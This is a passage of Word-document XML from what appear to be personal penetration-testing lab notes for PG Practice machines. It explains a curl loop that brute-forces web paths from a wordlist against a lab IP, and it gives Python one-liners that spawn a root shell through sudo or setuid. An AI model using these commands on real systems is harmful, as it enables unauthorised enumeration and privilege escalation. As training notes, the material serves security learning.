                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1129"/>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33E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BASE_URL="http://192.168.213.95/"; while IFS= read -r ENTRY; do curl "${BASE_URL}${ENTRY}"; echo; done &lt; dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BASE_URL="http://192.168.213.95/"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets a Bash variable called BASE_URL to the string http://192.168.213.95/. You can later use it with ${BASE_URL}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> while IFS= read -r ENTRY; do ... done &lt; dictionary.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a while loop that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IFS= </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ disables word splitting (makes sure lines with spaces are read fully).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read -r ENTRY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → reads one line at a time from the file (dictionary.txt) and puts it into the variable ENTRY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">done &lt; dictionary.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ tells the loop to read lines from the file dictionary.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In simple terms: for each line in dictionary.txt, do the following.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">do curl "${BASE_URL}${ENTRY}"; echo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "${BASE_URL}${ENTRY}"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → sends an HTTP GET request to http://192.168.213.95/&lt;ENTRY&gt; where &lt;ENTRY&gt; is the current line from the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → prints a blank line (just for neat output spacing).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What does it do overall?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It reads every line from dictionary.txt, appends it to http://192.168.213.95/, makes a curl request to that full URL, and prints a blank line between results.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p04l9c8oqr7q" w:id="465"/>
      <w:bookmarkEnd w:id="465"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sn9nao10ggr" w:id="466"/>
      <w:bookmarkEnd w:id="466"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to change code from python2 to python3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1130">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they had an exploit from exploitDB using python2. And when they tried to run it using the "python" command, it didn't work. So, they showed us how to change the code from python2 syntax to python3 syntax. Read the writeup for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003400">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003401">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003402">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c018qyuytl2v" w:id="467"/>
      <w:bookmarkEnd w:id="467"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get a bash shell when running python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003403">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are able to execute a python file as root, run this python line to open a shell (this code needs to be in a python file. This is not bash so it can't be run in the terminal):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003405">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os; os.system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003406">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003407">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if you are not in the python code but rather the terminal, then you can run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003408">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python -c 'import os; os.system("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003409">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1131">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we could run a python file as root. We removed it and replaced it with a file that had this, and we got root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os; os.setuid(0); os.system(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.setuid(0)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be redundant but it's good to be safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000340E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003411">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003412">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6tx7l4q9ns8s" w:id="468"/>
      <w:bookmarkEnd w:id="468"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Hosting (to Transfer files to target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003413">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003414">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, move to /tmp or any other non-important directory since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003415">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
